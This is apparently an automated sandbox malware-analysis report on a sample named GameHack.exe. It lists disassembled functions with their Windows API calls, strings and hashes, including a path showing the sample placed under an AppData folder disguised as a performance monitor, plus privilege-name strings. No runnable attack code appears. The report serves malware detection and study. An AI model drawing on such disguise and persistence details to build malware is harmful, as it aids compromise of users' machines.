                                      • Instruction ID: 5042318e7f6028109f669988dbf5d78c3460dcec82ef9250e1b0ff1fe71608b1
                                      • Opcode Fuzzy Hash: bd2db92db64b6eedafbac965dc26fee878571e9b10f61a2ed8dfda7ad045178a
                                      • Instruction Fuzzy Hash: C9F03CB2A0111DABCB205BA2DC4CEDBBF6EEF517A1F008012FA06E2010D6348545D7B1
                                      APIs
                                      • _wcschr.LIBVCRUNTIME ref: 00EEC435
                                        • Part of subcall function 00EE17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00EDBB05,00000000,.exe,?,?,00000800,?,?,00EE85DF,?), ref: 00EE17C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CompareString_wcschr
                                      • String ID: <$HIDE$MAX$MIN
                                      • API String ID: 2548945186-3358265660
                                      • Opcode ID: de8ed47d5b9f4e86eda45a2b2fa3ce42dfd8e4bf2e1b5b8eeb77e947c674864e
                                      • Instruction ID: 3b1acb80f0cf290b13d84b0e99d9af76255067e309a089a14a9c9ad445ad6abb
                                      • Opcode Fuzzy Hash: de8ed47d5b9f4e86eda45a2b2fa3ce42dfd8e4bf2e1b5b8eeb77e947c674864e
                                      • Instruction Fuzzy Hash: 3431817290068DAADF25DA96CC41EEB77FCEB14704F1050A6FA19F6090EBB09FC5CA50
                                      APIs
                                      • LoadBitmapW.USER32(00000065), ref: 00EEADFD
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00EEAE22
                                      • DeleteObject.GDI32(00000000), ref: 00EEAE54
                                      • DeleteObject.GDI32(00000000), ref: 00EEAE77
                                        • Part of subcall function 00EE9E1C: FindResourceW.KERNEL32(00EEAE4D,PNG,?,?,?,00EEAE4D,00000066), ref: 00EE9E2E
                                        • Part of subcall function 00EE9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00EEAE4D,00000066), ref: 00EE9E46
                                        • Part of subcall function 00EE9E1C: LoadResource.KERNEL32(00000000,?,?,?,00EEAE4D,00000066), ref: 00EE9E59
                                        • Part of subcall function 00EE9E1C: LockResource.KERNEL32(00000000,?,?,?,00EEAE4D,00000066), ref: 00EE9E64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                      • String ID: ]
                                      • API String ID: 142272564-3352871620
                                      • Opcode ID: 977a3932e496cdd9022bccb454bdf14f655f6221fb155e9c2faf57ee09a6bbad
                                      • Instruction ID: 651285a3ec0af885115404138b58d15ab667eaf9e58a033a8402685755b44da8
                                      • Opcode Fuzzy Hash: 977a3932e496cdd9022bccb454bdf14f655f6221fb155e9c2faf57ee09a6bbad
                                      • Instruction Fuzzy Hash: E801F9325406ADA7C71077669C06ABF7BFAAF81B51F0C1129FD00B72A2DF718C1596B2
                                      APIs
                                        • Part of subcall function 00ED130B: GetDlgItem.USER32(00000000,00003021), ref: 00ED134F
                                        • Part of subcall function 00ED130B: SetWindowTextW.USER32(00000000,00F035B4), ref: 00ED1365
                                      • EndDialog.USER32(?,00000001), ref: 00EECCDB
                                      • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00EECCF1
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00EECD05
                                      • SetDlgItemTextW.USER32(?,00000068), ref: 00EECD14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: RENAMEDLG
                                      • API String ID: 445417207-3299779563
                                      • Opcode ID: 74fc364e9b74fc4a82e785bd9a07cc9da5e6ff53084c8b51125369bcdf2a8628
                                      • Instruction ID: 59505ec176ebaf8aeb60122965b05e00b2a353e8516e8b68b4d582d12fb0fae5
                                      • Opcode Fuzzy Hash: 74fc364e9b74fc4a82e785bd9a07cc9da5e6ff53084c8b51125369bcdf2a8628
                                      • Instruction Fuzzy Hash: A001453238425C7AD1204F65AD08FAB7BADEB4A706F300010F34AB60E0C7629806E721
                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00EF251A
                                        • Part of subcall function 00EF2B52: ___AdjustPointer.LIBCMT ref: 00EF2B9C
                                      • _UnwindNestedFrames.LIBCMT ref: 00EF2531
                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00EF2543
                                      • CallCatchBlock.LIBVCRUNTIME ref: 00EF2567
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                      • String ID: /)
                                      • API String ID: 2633735394-750405031
                                      • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                      • Instruction ID: 2ca444cf4bf9040f47daaccc15bd8ab33402c26b92a6b778a64a5459ee0de437
                                      • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                      • Instruction Fuzzy Hash: 1A01023200010DABCF129FA5CC11EEA3BAAEF58714F159018FA1876120C336E961ABA1
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00EF7573,00000000,?,00EF7513,00000000,00F0BAD8,0000000C,00EF766A,00000000,00000002), ref: 00EF75E2
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EF75F5
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00EF7573,00000000,?,00EF7513,00000000,00F0BAD8,0000000C,00EF766A,00000000,00000002), ref: 00EF7618
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: a00b34ed01852d9ff12e46ef99631f3b48ad6d524069c361590a37c5e3113ec0
                                      • Instruction ID: d381afdd9f7c8bae2120eb945bb774e350c0c20bba0679f9b06efe138b147ac6
                                      • Opcode Fuzzy Hash: a00b34ed01852d9ff12e46ef99631f3b48ad6d524069c361590a37c5e3113ec0
                                      • Instruction Fuzzy Hash: B3F0AF30A0861CBBDB159B94DC09BAEBFB8EF04716F004068F805E2190DB708E40EA90
                                      APIs
                                        • Part of subcall function 00EE0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EE00A0
                                        • Part of subcall function 00EE0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00EDEB86,Crypt32.dll,00000000,00EDEC0A,?,?,00EDEBEC,?,?,?), ref: 00EE00C2
                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00EDEB92
                                      • GetProcAddress.KERNEL32(00F181C0,CryptUnprotectMemory), ref: 00EDEBA2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                      • API String ID: 2141747552-1753850145
                                      • Opcode ID: f4376507435191e0c6542645a3260fd8755772fe903ecf9df63852750b3460f8
                                      • Instruction ID: 43e3fc1762f31833c60799f882f7904fc17523682e774de8469daab91559574f
                                      • Opcode Fuzzy Hash: f4376507435191e0c6542645a3260fd8755772fe903ecf9df63852750b3460f8
                                      • Instruction Fuzzy Hash: 5FE04670801745AEDB30AF39980CB42BEE9AB14708F00981EE4D6F3280DAF4E580AB61
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 12577a9f6a54c63c071e0eb2309968233e9612d91d151b0eede4e9de50921ff9
                                      • Instruction ID: 764a6d37578b1fc06fccc9dc00334cc731b121702299c2198ba8310278e2e729
                                      • Opcode Fuzzy Hash: 12577a9f6a54c63c071e0eb2309968233e9612d91d151b0eede4e9de50921ff9
                                      • Instruction Fuzzy Hash: B941A132A003089BDB24DF78C881A6EB7E5EF89714F1555ADE655FB341EB31AD01CB80
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 00EFB619
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EFB63C
                                        • Part of subcall function 00EF8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EFC13D,00000000,?,00EF67E2,?,00000008,?,00EF89AD,?,?,?), ref: 00EF854A
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00EFB662
                                      • _free.LIBCMT ref: 00EFB675
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EFB684
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: fffa6434c4c2146e4a4af60d82a5e018437730640fd91d5ecb75efa005ed2a00
                                      • Instruction ID: 014880758eeea2bff2f5756a7727fe6994ff4aeabe70a9e4c280dd1fde6bcd90
                                      • Opcode Fuzzy Hash: fffa6434c4c2146e4a4af60d82a5e018437730640fd91d5ecb75efa005ed2a00
                                      • Instruction Fuzzy Hash: DE01A77260161DBF63211A76AC8CC7F7A6DEEC7BA43661229FE05E7110DF60CD0191B0
                                      APIs
                                      • GetLastError.KERNEL32(?,00F10EE8,00000200,00EF895F,00EF58FE,?,?,?,?,00EDD25E,?,00BB1600,00000063,00000004,00EDCFE0,?), ref: 00EF902E
                                      • _free.LIBCMT ref: 00EF9063
                                      • _free.LIBCMT ref: 00EF908A
                                      • SetLastError.KERNEL32(00000000,00F03958,00000050,00F10EE8), ref: 00EF9097
                                      • SetLastError.KERNEL32(00000000,00F03958,00000050,00F10EE8), ref: 00EF90A0
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 4a83088e52ee94598bbaae4d073f7cd4c42a5cdd3c87e6d0b32fbc85abbf88cf
                                      • Instruction ID: 7632dc5a0f22cd4c2c34f5eb16b806bfa41ec3ed68d3b9aa5bcc561f7f16f2ae
                                      • Opcode Fuzzy Hash: 4a83088e52ee94598bbaae4d073f7cd4c42a5cdd3c87e6d0b32fbc85abbf88cf
                                      • Instruction Fuzzy Hash: A701F472605A0C6BC32227356D85B7B369DBBC03797252024F759F2293EF60CC016161
                                      APIs
                                        • Part of subcall function 00EE0A41: ResetEvent.KERNEL32(?), ref: 00EE0A53
                                        • Part of subcall function 00EE0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00EE0A67
                                      • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00EE078F
                                      • CloseHandle.KERNEL32(?,?), ref: 00EE07A9
                                      • DeleteCriticalSection.KERNEL32(?), ref: 00EE07C2
                                      • CloseHandle.KERNEL32(?), ref: 00EE07CE
                                      • CloseHandle.KERNEL32(?), ref: 00EE07DA
                                        • Part of subcall function 00EE084E: WaitForSingleObject.KERNEL32(?,000000FF,00EE0A78,?), ref: 00EE0854
                                        • Part of subcall function 00EE084E: GetLastError.KERNEL32(?), ref: 00EE0860
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                      • String ID:
                                      • API String ID: 1868215902-0
                                      • Opcode ID: d7ed051b2930c3106b8bdeda7470e042179a4a42f79fdc23be70b9f8689c1d5b
                                      • Instruction ID: 8b30c453dba663b31d8a4def652d62cb52ae9fe21cb861946ebc56454faa47b5
                                      • Opcode Fuzzy Hash: d7ed051b2930c3106b8bdeda7470e042179a4a42f79fdc23be70b9f8689c1d5b
                                      • Instruction Fuzzy Hash: 1901B57144074CEFC7219B65DC84FC6BBEDFB48710F004529F15E52160CBB56A44DB90
                                      APIs
                                      • _free.LIBCMT ref: 00EFBF28
                                        • Part of subcall function 00EF84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958), ref: 00EF84F4
                                        • Part of subcall function 00EF84DE: GetLastError.KERNEL32(00F03958,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958,00F03958), ref: 00EF8506
                                      • _free.LIBCMT ref: 00EFBF3A
                                      • _free.LIBCMT ref: 00EFBF4C
                                      • _free.LIBCMT ref: 00EFBF5E
                                      • _free.LIBCMT ref: 00EFBF70
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 70fd4c65cfe1c8d2dfc0e4e2dad82261fe7cc6fa2004ac17541de5e8211e5017
                                      • Instruction ID: a3ffaeb78f61e003e51fc4ee066f7d1e681fe9d36376ade3a021cb268cd72b2e
                                      • Opcode Fuzzy Hash: 70fd4c65cfe1c8d2dfc0e4e2dad82261fe7cc6fa2004ac17541de5e8211e5017
                                      • Instruction Fuzzy Hash: 93F0FF3360520DA7CA20EF64EF86C2673D9FA007147646C09F619E7910CB20FC809A54
                                      APIs
                                      • _free.LIBCMT ref: 00EF807E
                                        • Part of subcall function 00EF84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958), ref: 00EF84F4
                                        • Part of subcall function 00EF84DE: GetLastError.KERNEL32(00F03958,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958,00F03958), ref: 00EF8506
                                      • _free.LIBCMT ref: 00EF8090
                                      • _free.LIBCMT ref: 00EF80A3
                                      • _free.LIBCMT ref: 00EF80B4
                                      • _free.LIBCMT ref: 00EF80C5
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: ad0fe8192ad4f4423600f48ebe3e5b18166a835b6ad611e07ed62b836fae99f5
                                      • Instruction ID: 5e90e392e5f8896d4988769143f9a8b61fa6efc08f0409c3ad3cf77a0dceb521
                                      • Opcode Fuzzy Hash: ad0fe8192ad4f4423600f48ebe3e5b18166a835b6ad611e07ed62b836fae99f5
                                      • Instruction Fuzzy Hash: 02F082B580212D8BC7116F15FE124263BA6F7147303086A1AF620A7A71CF314951BFD1
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe,00000104), ref: 00EF76FD
                                      • _free.LIBCMT ref: 00EF77C8
                                      • _free.LIBCMT ref: 00EF77D2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
                                      • API String ID: 2506810119-1912035815
                                      • Opcode ID: 4d78e288285773aa9e3e68851efe4d10546161d35f89ff1f1dd64bd8a04e6e0c
                                      • Instruction ID: 3fad37b552df1a12ef3f2adbe8dd5bea6936aaf8fc5464bfc2fec2a3ecb3c6c2
                                      • Opcode Fuzzy Hash: 4d78e288285773aa9e3e68851efe4d10546161d35f89ff1f1dd64bd8a04e6e0c
                                      • Instruction Fuzzy Hash: 9531A071A1420CAFDB21EF99DD819BEBBFCEB84315F2450A7F648A7251D6704E40DBA0
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED7579
                                        • Part of subcall function 00ED3B3D: __EH_prolog.LIBCMT ref: 00ED3B42
                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00ED7640
                                        • Part of subcall function 00ED7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00ED7C04
                                        • Part of subcall function 00ED7BF5: GetLastError.KERNEL32 ref: 00ED7C4A
                                        • Part of subcall function 00ED7BF5: CloseHandle.KERNEL32(?), ref: 00ED7C59
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                      • API String ID: 3813983858-639343689
                                      • Opcode ID: 66773ab7e5ec1d4fbd6ff28f7d6e12eb3756679d62972b8a84d52e9e2f3c326e
                                      • Instruction ID: 1f12186067fffa354bbedbd8dea9b4cd799af9edba91b57e714ec7e3c1cde176
                                      • Opcode Fuzzy Hash: 66773ab7e5ec1d4fbd6ff28f7d6e12eb3756679d62972b8a84d52e9e2f3c326e
                                      • Instruction Fuzzy Hash: F331B57190824CAEDF10EB65DC41BEEBBA9EF14354F005057F485B7392EBB08946D761
                                      APIs
                                        • Part of subcall function 00ED130B: GetDlgItem.USER32(00000000,00003021), ref: 00ED134F
                                        • Part of subcall function 00ED130B: SetWindowTextW.USER32(00000000,00F035B4), ref: 00ED1365
                                      • EndDialog.USER32(?,00000001), ref: 00EEA4B8
                                      • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00EEA4CD
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00EEA4E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
